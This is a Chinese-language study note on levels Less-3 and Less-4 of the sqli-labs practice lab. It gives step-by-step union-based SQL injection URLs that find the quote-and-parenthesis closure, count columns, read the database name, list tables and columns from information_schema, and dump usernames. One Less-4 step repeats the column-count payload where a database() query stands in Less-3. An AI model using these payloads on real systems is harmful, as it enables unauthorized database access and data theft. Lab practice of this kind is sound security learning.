sqli-labs靶场3~4笔记

Less-3

1.测试是否存在注入点:

复制代码
http://sqli-labs/Less-3/?id=1'

可以看出是单引号+小括号闭合。

复制代码
http://sqli-labs/Less-3/?id=1')--+

2 爆列数(回显位)

复制代码
http://sqli-labs/Less-3/?id=') union select 1,2,3--+

3.爆库

复制代码
#当前库
http://sqli-labs/Less-3/?id=') union select 1,2,database()--+

4.爆表

复制代码
#security库中所有表
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

5.爆列

复制代码
#爆security库中users表中所有列名
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

6.爆字段

复制代码
#这里就看一下security库中users表中username列中的所有数据
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(username) from security.users --+

Less-4

1.测试是否存在注入点:

是双引号+小括号闭合

2 爆列数(回显位)

复制代码
http://sqli-labs/Less-4/?id=") union select 1,2,3--+

3.爆库

复制代码
#当前库
http://sqli-labs/Less-4/?id=") union select 1,2,3--+

4.爆表

复制代码
#security库中所有表
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

5.爆列

复制代码
#爆security库中users表中所有列名
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

6.爆字段

复制代码
#这里就看一下security库中users表中username列中的所有数据
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(username) from security.users --+

总结

前两关的差别也是注入类型的区别,Less-3是单引号+小括号型,Less-4是双引号+小括号型。

相关推荐
酒鼎3 小时前
学习笔记(4)HTML5新特性(第3章)- WebSocket
笔记·学习·html5
-Springer-3 小时前
STM32 学习 —— 个人学习笔记2-2(新建工程)
笔记·stm32·学习
tb_first3 小时前
万字超详细苍穹外卖学习笔记4
java·spring boot·笔记·学习·spring·mybatis
日更嵌入式的打工仔3 小时前
C内存布局
笔记
卡布叻_星星4 小时前
达梦数据库笔记之使用教程以及不推荐迁移选择小写
笔记
山岚的运维笔记4 小时前
SQL Server笔记 -- 第15章:INSERT INTO
java·数据库·笔记·sql·microsoft·sqlserver
孞㐑¥4 小时前
算法—队列+宽搜(bfs)+堆
开发语言·c++·经验分享·笔记·算法
charlie1145141914 小时前
嵌入式C++教程——ETL(Embedded Template Library)
开发语言·c++·笔记·学习·嵌入式·etl
TheNextByte15 小时前
如何在iPhone上恢复已删除的笔记的综合指南
笔记·ios·iphone
laplace01235 小时前
Claude Code 逆向工程报告 笔记(学习记录)
数据库·人工智能·笔记·学习·agent·rag